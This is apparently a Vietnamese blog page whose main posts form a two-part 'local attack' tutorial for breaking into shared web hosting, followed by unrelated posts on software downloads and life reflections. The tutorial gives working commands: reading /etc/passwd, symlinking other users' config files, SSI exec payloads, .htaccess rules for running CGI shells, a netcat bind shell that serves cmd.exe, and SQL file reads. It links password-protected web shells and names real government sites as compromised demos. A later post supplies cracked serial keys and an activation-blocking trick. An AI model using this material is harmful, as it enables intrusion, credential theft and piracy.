Thứ Hai, 30 tháng 9, 2013

Tổng Hợp Các Phương Pháp Local Attack Thường Dùng(phan 2)[​IMG]
- Vào link shell http://www.vksbinhphuoc.gov.vn/soleil/tmp/config.sa

- Coppy toàn bộ thông tin user có được từ câu lệnh: cat /etc/passwd vào khung như hình ảnh dưới đây rồi ấn “get config”

[​IMG]
- Cuối cùng trở lại link http://vksbinhphuoc.gov.vn/soleil/tmp/ , chúng ta sẽ có được danh sách các file config của các site trên server.
[​IMG]
* Đặc điểm của con shell get all config này:
+ Là 1 công cụ cực kỳ thuận tiện, giảm bớt thời gian và công sức khi local attack
+ Chỉ sử dụng đối với các server cho chạy shell cgi và cho quyền symlink
+ Không bypass được, chỉ symlink đối với các site chưa chmod và có path dẫn đến file config là mặc định.

6- Symbolink Root:
- Download file r00t.tar.gz về và upload lên host:
http://www.mediafire.com/?21kycoh4g5s4ojo ( pass download: soleil_vhb, pass dải nén: ceh.vn )
- Sau đó giải nén file root.tar.gz, sử dụng lệnh sau:
Tar –zxvf r00t.tar.gz
- Up file .htacess cùng thư mục với file r00t:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
- Nếu không sủ dụng file r00t.tar.gz đó, có thể thực hiện sym root ngay trên shell
Demo:
http://tnmthatinh.gov.vn/soleil/r00t/

Và đây là cấu trúc của trường http://cdhh.edu.vn/
http://tnmthatinh.gov.vn/soleil/r00t/home/cdhh/public_html/

7- Backconnet:
Có thể hiểu đơn giản là kết nối bằng cổng sau, nghĩa là sử dụng shell backconnet và tool netcat (nc.exe) để mở sẵn 1 cổng trên server, sau đó từ máy tính của attacker kết nối với server qua cổng đã được mở sẵn đó. Mọi câu lệnh thực thi đối với server có thể thực hiện trên máy tính của attacker qua command line.
Đồ nghề cần thiết:
- Tool netcat (nc.exe)
http://www.mediafire.com/?npsob8c7dd9nr40
- Shell back connect đối với asp:
http://www.mediafire.com/?etciiuskzvyhjcw
Chú ý, trong shell có 1 đoạn code như: "G:\domains\tvled.vn\wwwroot\austdoor\design\nc.exe -l -p 1234 -e cmd.exe -d"
Lúc up shell lên cần edit lại “G:\domains\tvled.vn\wwwroot\austdoor\design\” thành path của server dẫn tới file nc.exe.
- Shell backconnet đối với php
http://www.mediafire.com/?8o1sj35cs51lsiw
( Pass unlock soleil_vhb; Pass dải nén: ceh.vn )
- Download tool nc.exe rồi đặt trong ổ C chẳng hạn, sau đó mở cửa sổ command line và sử dụng netcat để mở cổng trên local host kết nối với server đã mở sẵn cổng
- Cú pháp: + chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
+ chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]
Một số câu lệnh có thể sử dụng:
nc -nvv -l -p 80
nc -lvvnp 3333
nc -nvv -l -p 12345
nc 127.0.0.1 7777
nc -vv -l -p 7777
nc -vlp 443
+ -l: đặt netcat vào chế độ lắng nghe để chề kết nối đến
+ -n: Chỉ dùng ip ở dang số, ví dụ: 123.30.2.42, netcat sẽ ko xét đến DNS.
+ -p: Chỉ định cổng cần lắng nghe hay kết nối
+ -v: Hiện thi các thông tin về kết nối hiện tại. –vv sẽ hiện thị thông tin chi tiết hơn nữa.
- Lưu ý là cần coppy nc.exe vào 1 vị trí nào trong máy rồi sử dụng command đến thư mục chứa nc.exe trước khi thực hiện các câu lệnh liên quan đến netcat
- Sauk hi đã backconnect thành công thì tiến hành local đơn giản chỉ bằng 1 câu lệnh coppy shell từ site đã up được shell tới site victim.
8- Via SQL
- Login vào database và tạo 1 table để load các thông tin bằng cách sử dụng querry sau
create table soleil ( ducdung08clc varchar (1024));
- Query load các thông tin vào table table vừa được tạo:
load data local infile '/etc/passwd' into table soleil
Có thể thay câu lệnh “/etc/passwd” bằng path dẫn đến file config.
- Query hiện thị các thông tin được load vào table soleil:
select * from soleil
- Phương pháp này được gọi là Via SQL, chủ yếu sử dụng khi server không cho chạy run command và có thể bypass đối với 1 số server.
1 số lưu ý:
- Đối với 1 số server Safe_mod: ON, thì shel không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi:
[​IMG]
+ Soleil.pin
http://www.mediafire.com/?4k94v1i0shmr46c

Cách sử dụng:
- Up shell soleil.pin và chmod nó về 755
- Up hoặc tạo file .htaccess trong thư mục chứa shell có nội dung:
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##

Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cin

AddHandler cgi-script .pin
AddHandler cgi-script .pin
+ telnet.pl
http://www.mediafire.com/?t9cavs1n0ipthq1

shell telnet.pl có chức năng hoàn toàn tương tự với con shell soleil.pin. Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là chạy được.
[​IMG]
( Pass unlock: soleil_vhb, pass dải nén nếu có : ceh.vn )
- * Đối với các server không có chức năng run command và cũng không cho chạy shell cgi thì có thể sử dụng các shell sau để bypass đơn giản đối với 1 số server.
+ fakesymlink.php
http://www.mediafire.com/?fc9kencnilx0rm4 ( 5.2.12 -> 5.3.1
http://www.mediafire.com/?kmid8rahl5wjh74 ( version 5.3 -> 5.4 )
+ 529bypass.php
http://www.mediafire.com/?cls0e5k873w83ef
+ Bypassnull.php
http://www.mediafire.com/?1x0zxmig5ctwezr

+ Hoặc sử dụng safe mode bypass
http://www.mediafire.com/download.php?38d13jgqw132db2

+ Sử dụng các chức năng bypass trên con shell r57vip này ( nên convert domain sang dạng ip)
http://www.mediafire.com/?sqjs5du3srlifqt

+ Hoặc sử dụng via sqli
v.v….
(Tất cả các shell download trên đều có pass unlock: vhb_soleil và pass dải nén nếu có: ceh.vn)
Trong bài tut trên soleil đã giới các phương pháp local attack cơ bản và các dạng bypass cơ bản nhất có thể sử dụng. Trong bài tiếp theo soleil sẽ đề cập đến các dạng bypass nâng cao đối với 1 số server khó, các thủ thuật vượt chmod qua 400 permission, chiếm quyền điều khiển root (get root) và các kỹ thuật up shell đối với 1 số mã nguồn mở như: joomla, worpress, nukeviet, vbulletin, drupal……
Xem tiếp...

Tổng Hợp Các Phương Pháp Local Attack Thường Dùng(phan 1)


* Nhắc lại trình tự các bước Local Attack

1- View danh sách các user trong server
2- Tìm file config.php
3- Get thông tin login vào database
4- Crack hoặc change pass admin
5- Login vào quyên quản trị và upshell

1- View danh sách các user trên server
Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, source code là gì từ đó tìm cách đọc file config.php của user đó
- Một số câu lệnh để get user:
Lệnh phổ biến nhất:

Cat /etc/passwd
Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt
Less /etc/passwd
./cat/etc/passwd
More /etc/passwd
Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:
http://www.mediafire.com/?gic70c6ce441333
http://www.mediafire.com/?hi4gnmu3kpxn095 ( đk: chmod 755)
http://www.mediafire.com/?2rk42hiv9b4ii3f
Pass download: soleil_vhb
Pass dải nén: ceh.vn
- Câu lênh get user & domain
Cat /etc/virtual/domainowners ( Chỉ dùng đối với direct admin )​

2- Tìm file path file config.php
Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html

- Vbulletin:
path/includes/config.php
- Mybb:
path/inc/config.php
- Joomla:
path/configuration.php
- Word-Press:
path/wp-config.php
- Ibp:
path/conf_global.php
- Php-fusion:
path/config.php
- Smf:
Path/Settings.php
- Nuke:
path/config.php
- Xoops:
path/mainfile.php
- Zen Cart
Path/includes/configure.php
- path/setidio:
path/datas/config.php
- Datalife Engine:
path/engine/data/config.php
- Phpbb:
Path/config.php
- Wordpress:
path/wp-config.php
- Seditio:
path/datas/config.php
- Drupal:
path/sites/default/settings.php
- Discuz
path/config/config_ucenter.php
- Bo-Blog
path/data/config.php

- Đây là path mặc định đối với các mã nguồn mở, còn đối với site tự code thì thông thường path vẫn đặt hay ngay sau thư mục public_html ( path/config.php ).
- Đối với các quản trị viên chú ý đến tính năng bảo mật, phòng tránh local attack thì họ thường dấu kỹ và thay đổi path dẫn đến file config, trong trường hợp này cần phải dò path bắt đầu từ file index đi vào. Soleil sẽ lấy ví dụ dò path file config đối với vbulletin chẳng hạn:
Forum.php -> global.php -> includes/class_bootstrap -> includes/init.php -> includes/class_core.php -> includes/config.php
( Để tìm kiếm path trong source, search theo từ khóa: “cwd”, ta sẽ thấy đoạn code tương tự như: “require_once(CWD . '/includes/init.php');” - Đây là path mặc định dẫn tới file init.php))……
3- Get thông tin file config
Phần này chính là phần trọng tâm nhất trong bộ tut local attack. Trong phần này soleil sẽ giới thiệu đầy đủ các kỹ thuật cơ bản để local attack.
3.1- Trước hết ta cần tìm hiểu qua về các câu lệnh cơ bản trong linux ứng dụng cho local attck:
- Ls , dir : Liệt kê tên các file bên trong thư mục
ls -al, ls -lia: Liệt kê tên và thuộc tính các file bên trong thư mục
Ls -lia /home/vhbgroup/public_html/@4rum/includes.config.php
- Cat, ./cat, less, more, tail : View nôi dung bên trong các file:
Cat /home/vhbgroup/public_html/@4rum/includes/config.php
- Ln : Lệnh symbolic link:

Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini

- Cd: Chuyển đổi thư mục
Ví dụ muốn chuyển tới thư mục soleil”
Cd /home/vhbgroup/public_html/@4rum/includes/soleil
cd ~ : Tới thư mục home dictionary
cd -: Quay lại thư mục vừa làm việc
cd ..: Tới thư mục kề bên ngoài thư mục đang làm việc​
- Chmod: Phân quyền cho các file hoặc thư mục:
Chmod 400 config.php ( đang làm việc trong thư mục includes chứa file config.php )​
- Mkdir: tạo thư mục:
Ví du muốn tạo thư mục soleil trong thư mục includes:
Mkdir /home/vhbgroup/public_html/@4rum/includes/soleil
- Touch : Tạo file:
touch /home/vhbgroup/public_html/@4rum/includes/soleil.php
- Tar, zip: Lệnh nén và giải nén: thường sử dụng trong symlink root
Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thư mục soleil thành file ducdung08clc.tar.gz)
Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)​
Zip –r -9 ducdung08clc.zip soleil ( Nén thư mục soleil thành file ducdung08clc.zip)
Zip -p ducdung08clc.zip ( Giải nén file ducdung.tar.gz)​
…………
3.2-Phần tiếp theo Soleil sẽ trình bày 1 số kỹ thuật dùng để lấy thông tin file config.php
1- Sử dụng các lệnh cat, dir để xem tên thư mục, tệp tin và đọc nội dung tệp tin.
Ví dụ:
dir /home/vhbgroup/public_html/includes
cat /home/vhbgroup/public_html/includes/config.php
Nhưng hiện nay phần lớn các server đều không cho phép thực thi những hàm này nên ứng dụng phương pháp này không mấy khả thi
2- Sử dụng Symbolic link – Gọi tắt là symlink
Symbolic link là kỹ thuật cơ bản và gần như là quan trọng mà phần lớn các attaker nghĩ đến đầu tiên trước khi thực hiện công việc local attack.
Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini

Có thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php của user vhbgroup trên server có path /home/vhbgroup/public_html/@4rum/includes/config.php
Có thể thay soleil.ini bằng .txt nhưng do thói quen soleil vẫn hay sử dụng .ini hơn bởi vì đối với 1 số server bị lỗi nó có thể bypass permissions 400.
3- Sử dụng symlink kết hợp với ssi:
Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.
- Tạo 1 file ducdung08clc.shtml với nội dung như sau:
<!--#include virtual="soleil.ini"-->
Trong đó file soleil.ini là file đã được symbolic link trên server.
Bây giờ view source của file ducdung08clc.shtml ta sẽ thấy đc nội dung file soleil.ini đã symbolic link.
4- Chạy lệnh bằng file .shtml
- Tuy nhiên có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml
<!--#exec cmd="cat /etc/passwd"-->​
- Lệnh xem file logs như sau:
<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->
Lưu ý: + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.
+ /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
+ Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.
5- Get all config toàn server
- Đâu tiên download shell get all config ( w.php) về rồi up lên server.
http://www.mediafire.com/?hi4gnmu3kpxn095 ( pass unlock: soleil_vhb )
[​IMG]
- Click vào done và thư mục có tên là tmp sẽ được tạo ra.
- Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:
+ dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).
+ user.sa : Shell này dung để xem danh sách các user và domain trên server.
+ config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink
Xem tiếp...

Giáo trình hệ điều hành

Hệ điều hành là thành phần quan trọng trong bất cứ hệ thống máy tính nào. Do đó, môn học hệ điều hành là cần thiết cho chương trình giảng dạy sinh viên ngành khoa học máy tính. Giáo trình này mong muốn giới thiệu một cách rõ ràng các khái niệm nằm bên dưới hệ điều hành. Giáo trình này không tập trung vào một hệ điều hành hay phần cứng cụ thể nào. Thay vào đó, giáo trình sẽ thảo luận những khái niệm cơ bản được áp dụng trong từng hệ điều hành khác nhau.

Tải tài liệu miễn phí :
+ 4share : Giáo trình hệ điều hành.pdf
+ Fshare : Giáo trình hệ điều hành.pdf
Xem tiếp...

Tôi học được rằng...

Tôi học được rằng : Có những điều dù ta chỉ làm trong khoảnh khắc nhưng lại làm ta đau lòng cả đời

Tôi học được rằng : Mỗi khi xa người thân yêu hãy nói những lời thân yêu nhất,bởi vì có thể đó là lần cuối cùng ta gặp họ.

Tôi học được rằng: Đã là bạn thân, dù không làm gì cả, ta vẫn có những giây phút tuyệt vời bên nhau.

Tôi học được rằng : Tình bạn chân thành sẽ mãi lớn lên dù cho ngàn dặm cách xa, và tình yêu đích thực cũng thế đấy

Tôi học được rằng: Có ai đó không yêu ta theo cái cách mà ta mong muốn,điều đó không có nghĩa là họ không yêu ta hết lòng. Đối với những người bạn tốt,sẽ chẳng có vấn đề gì nếu chẳng may họ làm tổn thương ta,và hãy biết tha thứ cho họ về điều đó.

Tôi học được rằng : Sẽ không đủ nếu chỉ biết tha thứ cho người khác. Đôi khi chúng ta phải biết cách tha thứ cho chính mình.

Tôi học được rằng : Bất kể con tim ta có tan vỡ,cuộc sống cũng sẽ chẳng dừng lại,và vẫn vô tình như không biết đến tổn thương của ta.

Tôi học được rằng: Cuộc đời ta có thể bị đổi thay tại một khoảnh khắc nào đó bởi một người thậm chí ta không quen biết.

Tôi học được rằng : Ngay cả khi trắng tay,ta vẫn có thể thấy được mình thật giàu có để giúp đỡ khi bạn bè cần đến

Tôi học được rằng: Người mà ta rất quan tâm, thậm chí cả cuộc đời lại có thể rời xa ta rất sớm.Người mà ta nghĩ sẽ vùi ta xuống đất đen khi hoạn nạn,nhưng chính họ lại nâng đỡ ta khi vấp ngã.

Tôi học được rằng: Khi không vui ta có quyền gian dối,nhưng lại chẳng được phép tàn bạo và hung ác.

Tôi học được rằng: Trên đời này,không phải ai cũng tốt và tử tế với ta cho dù ta không động chạm đến họ. Cách tốt nhất là ta đừng nên để ý tới những kẻ muốn chứng kiến ta gục ngã. Hãy sống vì những người yêu quí ta.
Tôi học được rằng: Để thành "nhân" ta phải mất thời gian rất dài

Tôi học được rằng: Hãy chịu trách nhiệm về những gì ta làm,dù điều đó có làm ta tan nát.

Tôi học được rằng: Nếu ta không làm chủ được hành vi của mình, nó sẽ điều khiển lại chính ta.

Tôi học được rằng: Người trưởng thành có nhiều điều phải suy nghĩ với những kinh nghiệm đã qua,và có những bài học rút ra từ đó.

Tôi học được rằng: Hoàn cảnh sống có ảnh hưởng tới việc hình thành nhân cách của chúng ta,nên hãy ý thức về điều đó.

Và tôi cũng học được rằng: Chiếc áo cà sa không làm nên lốt thầy tu,ta không nên quá háo hức để khám phá bí mật vì nó có thể làm thay đổi cuộc đời ta mãi mãi. Dù hai người cùng nhìn vào một vật nhưng họ lại có thể thấy những điểm khác biệt rất lớn...Chính vì vậy, hãy chia sẽ những khác biệt bạn nhìn thấy để tạo nên sự đa dạng trong cách nhìn sự vật của bạn
Xem tiếp...

Có những nỗi đau không cần phải quên

Ngã sẽ đau. Ai cũng sợ đau. Nhưng không ai chưa từng bị đau, dù chỉ là một lần trong đời. Và cũng có những nỗi đau không cần phải quên...


Cuộc sống là những chuỗi lần vấp ngã rồi đứng lên, thương tích là điều không thể tránh khỏi. Những vết thương rồi sẽ tự lành da. Có khi chúng thành sẹo loang lỗ, in hằn dai dẳng không xóa được. Có khi sau bao năm nhìn lại, chỉ thấy hình ảnh mờ ảo nhạt nhòa, cố thế nào cũng chẳng thể nhìn rõ.


Ngã sẽ đau. Ai cũng sợ đau. Nhưng không ai chưa từng bị đau, dù chỉ là một lần trong đời.


Đôi khi nỗi đau mang một ý nghĩa quan trọng và thiêng liêng. Vì nếu cả cuộc đời này đều tươi hồng và phủ đầy màu yên vui thì liệu còn ai trân trọng những điều mình đang có? Liệu có ai cảm thấy hạnh phúc khi may mắn mỉm cười? Vì mỗi vết thương là một bài học đáng để khắc ghi.


Đó là lúc ta tập đi rồi té ngã, khóc nức nở vì sợ hãi, nhức nhối đau rát vì trầy xước. Nó dạy ta biết đi trên chính đôi chân mình, không cần dìu đỡ, không cần nâng niu. Một ngày ta tự do bay nhảy, ta sẽ cảm ơn lắm lần té ngã đầu đời.


Đó là lúc ta trốn học đi chơi rồi bị mẹ bắt, khóc mếu máo vì bị đòn đau, nấc từng cơn để nói lời xin lỗi. Ta trở thành một đứa con ngoan, ta trân trọng khoảng khắc được đến trường, ta biết dù thế nào cũng không được làm cha mẹ buồn lòng.


Có những nỗi đau không cần phải quên
Đó là lúc ai đó từ chối tình cảm nơi ta, buồn bã vì mầm xanh chưa kịp nảy đã tàn úa chết khô. Ta hiểu được rằng thế gian này còn nhiều thứ không như ta mong muốn, điều ta nên làm là chấp nhận nó, chấp nhận cuộc sống này vốn không chỉ có màu hồng êm ái. Và sẽ còn nhiều, nhiều lắm những người thích hợp với ta.


Đó là lúc người ta yêu thương mất đi, về với thế giới xa lạ. Nước mắt không ngừng tuông, lòng nặng trĩu hoặc trống rỗng một lỗ sâu không đáy. Ta biết sống tốt hơn từng ngày, quý mến từng khoảng khắc trên cuộc đời này, sống xứng đáng và sống cả phần của họ.


Đó là lúc người thân yêu quay lưng với ta. Cảm giác nhơ nhuốc và thất vọng vì bị bội phản, nước mắt không rơi được, mọi điều tốt đẹp vỡ tan như bong bóng xà phòng. Nó dạy ta biết mạnh mẽ và kiên cường, đặt niềm tin đúng chỗ, bản lĩnh và không bao giờ được làm điều tương tự với người khác.


Đó là lúc người ta yêu nhẫn tâm bỏ ta ở lại. Nỗi đau quay quắt thấu cả vào tim, nước mắt nuốt ngược vào trong và nghẹn thắt từng nhịp thở. Đó là lúc đôi chân ta bỗng cứng cáp lạ thường. Hiểu rằng ai cũng cần cô đơn, để hiên ngang đứng giữa đất trời, để yêu bản thân thêm nhiều lần nữa, để cho tim mình được nghỉ ngơi trước khi tìm được một người thật sự xứng đáng.


Có những vết thương cứ cứng đầu bám mãi trong tim.


Có những nỗi đau không dễ dàng xóa, càng muốn rũ bỏ chúng lại càng mang hình hài rõ ràng.


Thế nhưng dù thời gian còn phải đầu hàng trước những nỗi đau rất lì lợm không chịu biến mất thì vẫn có những-thứ-không-cần-phải-quên.
Xem tiếp...

Camtasia 8.1.2 Full Serial Key - Phần mềm quay phim màn hình chuyên nghiệp

Camtasia 8.1.2 Full Serial Key - Phần mềm quay phim màn hình chuyên nghiệp

Phần mềm Quay phim màn hình hiện nay được sử dụng nhiều để tạo các video hướng dẫn sử dụng máy tính, thủ thuật ... Khi nhắc tới thể loại phần mềm này chắc chúng ta không thể quên camtasia. Camtasia là 1 phần mềm quay phim màn hình chuyên dụng, camtasia cho phép quay lại toàn bộ màn hình hoặc chỉ 1 phần màn hình được chọn. Đặc biệt, camtasia còn cho phép bạn chọn nhanh 1 cửa sổ chương trình để chỉ quay lại diễn biến trên chính cửa sổ đó mà thôi.

Camtasia 8.1.2 Full Serial Key - Phần mềm quay phim màn hình chuyên nghiệp

Sau khi quay phim màn hình, camtasia cung cấp cho bạn 1 công cụ khá chuyên nghiệp để chỉnh sửa video vừa quay lại và cho tùy chọn xuất ra nhiều định dạng video và chất lượng khác nhau tùy ý. Ngoài ra, bạn có thể upload nhanh lên các trang chia sẻ video để chia sẻ với bạn bè của mình.

Camtasia 8.1.2 Full Serial Key - Phần mềm quay phim màn hình chuyên nghiệp

Hiện tại, TechSmith đã phát hành camtasia 8.1.2 (mới nhất 2013). Bạn có thể download miễn phí kèm serial key bên dưới:

Download camtasia 8.1.2 Camtasia 8.1.2 Full Serial Key
+ 4share : Camtasia_8.1.2_Full_For_Windows.zip - Camtasia_8.1.2_Full_For_MAC.zip
+ Fshare : Camtasia_8.1.2_Full_For_Windows.zip - Camtasia_8.1.2_Full_For_MAC.zip
+ Copy : Camtasia_8.1.2_Full_For_Windows.zip - Camtasia_8.1.2_Full_For_MAC.zip
+ Dropbox : Camtasia_8.1.2_Full_For_Windows.zip - Camtasia_8.1.2_Full_For_MAC.zip
+ Upfile : Camtasia_8.1.2_Full_For_Windows.zip - Camtasia_8.1.2_Full_For_MAC.zip

Hướng dẫn cài đặt và crack camtasia:
1. Ngắt mạng internet
2. Dùng notepad mở file C:\Windows\System32\drivers\etc\hosts thêm vào cuối file đoạn sau
PHP Code:
127.0.0.1       activation.cloud.techsmith.com
127.0.0.1      oscount
.techsmith.com 
3. Cài đặt camtasia bình thường với thông tin đăng ký sau
Name: TYVN.Biz
Serial key: Chọn 1 trong số những key dưới
PHP Code:
GCABC-CPCCE-BPMMB-XAJXP-S8F6R
EA5AC
-CLMAM-A8W6W-EZLYM-LM58F
HLCZF
-HDCPL-KGB6W-ZSCAZ-VF6A2
G4DCD
-9CC5J-JTDPC-FQJ9X-X735A 
Chúc các bạn thành công !
Xem tiếp...

KMPlayer 3.7 - Phần mềm xem phim nghe nhạc miễn phí tốt nhất

KMPlayer 3.7 - Phần mềm xem phim nghe nhạc miễn phí tốt nhất

KMPlayer là chương trình chơi nhạc mạnh nhất hiện nay, nó là một trình xem movie và nghe audio của Hàn Quốc hỗ trợ nhiều codec và các định dạng file. Nó xem được tất cả các định dạng audio, video, vcd, dvd mà không cần phải cài đặt thêm codec cho máy tính. Phần mềm này có chức năng playback đầy đủ các VCD/DVD.

KMPlayer có giao diện khá giống Winamp và có nhiều tính năng độc đáo, bạn có thể tùy chọn thay đổi việc audio output 1 kênh hay 2 kênh, chọn chế độ ontop, hay giữ tỉ lệ màn hình khi phóng to thu nhỏ, mở các file cùng loại trong 1 thư mục (khi bạn mở 1 file, KMPlayer sẽ tự động tìm các file cùng loại trong thư mục đó và add vào Playlist), …

Nếu không có chương trình Codec riêng biệt, bạn vẫn có thể chạy bất kỳ tập tin đa phương tiện nào thông qua KMP vì nó có codec được tích hợp sẵn. Đối với Codec âm thanh, KMPlayer hỗ trợ C3, DTS, MPEG1, 2, AAC, WMA 7, 8, OGG... Với việc gắn codec được xử lý bên trong, KMPlayer hoạt động nhanh hơn và an toàn hơn. Nếu bạn là một người dùng Windows thông thường thì thật khó khăn và bất tiện khi muốn cài đặt thêm codec, chỉ cần download KMPlayer và việc xem video hay nghe nhạc của bạn trở nên dễ dàng hơn nhiều.

KMP Plus là gì ?
KMP+ cung cấp chức năng cho phép người dùng dễ dàng quản lý và sắp xếp các tập tin Video, Music, DVD lưu trữ trên máy tính, thông qua đó các tập tin đa phương tiện sẽ dễ dàng được truy cập từ các thiết bị giải trí trong gia đình.
Album Art 2.0

Với một hệ thống thư viện quản lý thông minh - KMP Album Art 2.0 - cung cấp nhiều nội để người dùng có thể dễ dàng quản lý các tập tin đa phương tiện. Như tổ chức các loạt video có thể tự động kết hợp thành một video vào một thư mục riêng biệt; cung cấp các hình ảnh (áp phích) minh họa cho bài hát hoặc album của bài hát. Thông qua đó người dùng có thể quản lý album của mình một cách tối ưu nhất.

KMP 3D
KMPlayer hỗ trợ định dạng 3D (side-by-side, trên và dưới) cho hệ thống có bộ nhớ CPU thấp, phát ổn định thông qua hỗ trợ GPU. Chỉ với một nhấp chuột, bạn có thể dễ dàng trải nghiệm thế giới điện ảnh 3D tại nhà.
Và cuối cùng, trên với tất cả các tính năng trên, KMPlayer lại được cung cấp hoàn toàn miễn phí!

KMPlayer 3.7 - Phần mềm xem phim nghe nhạc miễn phí tốt nhất

Có gì mới trong KMPlayer 3.7
+ Supports 3D Formats.
+ Supports 10-bit H.264.
+ Supports Intel Widi
+ Added video codec "DV5P"
+ Add new function album art
+ Thumbnail image display enhancement when playing audio files.
+ Fixed ColorSpace bug
+ Fixed Intel Codec H.264
+ Fixed Winamp plugin
+ Error correction of images infected with malicious codes.
+ Fixed view as a desktop mode in Windows 7
+ Fixed improper load of Album Art bug
+ Correction of screen display error when using EVR - if you skip from the WMV file.
+ Fixed KMP HTTP Reader
+ AAC codec Parser error correction from MOV file
+ MKV Skip Problem

Download KMPlayer 3.7 Full
+ 4share : KMPlayer_3.7.0.106.zip
+ Fshare : KMPlayer_3.7.0.106.zip
+ Copy : KMPlayer_3.7.0.106.zip
+ Dropbox : KMPlayer_3.7.0.106.zip

Xoá quảng cáo KMPlayer 3.7 Full
+ Fshare : kmplayer_3.7_patch.zip
+ 4share : kmplayer_3.7_patch.zip
Xem tiếp...

Onekey ghost version 13.4.5.203 - công cụ ghost nhỏ gọn và tiện lợi

Onekey ghost version 13.4.5.203 - công cụ ghost nhỏ gọn và tiện lợi

Onekey ghost version 13.4.5.203 - công cụ ghost nhỏ gọn và tiện lợi

Onekey Ghost là một phần mềm giúp bạn thực hiện thao tác Ghost trực tiếp ngay trong Windows đang sử dụng. Với Onekey Ghost việc sao lưu và phục hồi Windows trở nên vô cùng đơn giản. Ghost lại Windows để bảo toàn dữ liệu khi máy bị virus hay windows bị lỗi luôn cần thiết với mọi người.

Thay đổi trong phiên bản Onekey Ghost 13.4.5.203
+ Hỗ trợ thêm định dạng ổ GPT
+ Các chi tiết thiết lập được thiết kế và trình bày rõ ràng hơn
+ Tính năng tự tìm ổ đĩa chứa tập tin Ghost được tối ưu hóa
+ Hiệu năng hoạt động được nâng cao
+ Hỗ trợ tốt hơn cho Windows 8

Link download :
Box : OneKey_V13.4_Tools_Ghost_Mini.zip
Fshare : OneKey_V13.4_Tools_Ghost_Mini.zip
4share : OneKey_V13.4_Tools_Ghost_Mini.zip
Dropbox : OneKey_V13.4_Tools_Ghost_Mini.zip
Mediafire : OneKey_V13.4_Tools_Ghost_Mini.zip
Xem tiếp...

Avast Internet Security 9 mới nhất miễn phí license 2016

Avast! Internet Security có thể ngăn chặn người khác trộm cắp những dữ liệu cá nhân, xâm phạm vào sự riêng tư, ngăn chặn email lừa đảo, ngăn chặn virus và những phần mềm gián điệp. avast! Internet Security là một giải pháp toàn diện, bao gồm tất cả các tính năng của avast! Pro Antivirus.

Avast Internet Security 9 mới nhất miễn phí license 2016

Avast Internet Security 9 mới nhất miễn phí license 2016

Những tính năng chính của avast! Internet Security :
Chống virus để tự bảo vệ mình
avast! Internet Security cung cấp cho bạn những chức năng để chống virus, chặn phần mềm gián điệp, chặn thư rác và bảo vệ tưởng lửa. avast! Internet Security bổ xung các tùy chọn hỗ trợ từ xa, cập nhật phần mềm và tích hợp avast! SafeZone để ngăn chặn những mối đe dọa về ngân hàng và mua sắm trực tuyến mà bạn gặp phải.

Bảo vệ danh tính của bạn
Tích hợp tường lửa để ngăn chặn những hacker cố gắng xâm nhập trái phép để ăn cắp những dữ liệu cá nhân, dữ liệu nhạy cảm trên máy tính của bạn. Ngoài ra, những thư rác và lừa đảo sẽ bị ngăn chặn với chức năng chống thư rác được tích hợp.

Thỏa mái mua sắm và giao dịch ngân hàng trực tuyến mà không cần lo lắng
SafeZone là một cửa sổ ảo trên máy tính của bạn, để bảo mật cho những giao dịch tài chính nhạy cảm khi online. Công cụ rất phù hợp với những trang web đấu giá, vé số, đặt phòng khách sạn hoặc chỗ trên hãng hàng không, chơi game trực tuyến, hay bất kỳ giao dịch tiền tệ.

Lướt web và mạng xã hội mà không cần lo lắng
Sandbox cho phép bạn lướt web và chạy các chương trình nguy hiểm ảo bên ngoài máy tính của bạn. Và Web, IM, P2P sẽ được đảm bảo an toàn trên mạng xã hội (chẳng hạn như Facebook hay Twitter) và các trang web hẹn hò trực tuyến, cuộc trò chuyện IM (ví dụ như Skype hay ICQ), hoặc các trang web chia sẻ file peer-to-peer.

Bảo vệ bạn trong thời gian thực
Công nghệ đám mây Hybrid cập nhật cơ sở dữ liệu virus để bảo vệ máy tính trong thời gian thực. Do đó, phần mềm avast! có thể phát hiện ra tất cả các loại virus.

Quản lý avast! trên tất cả các thiết bị của bạn
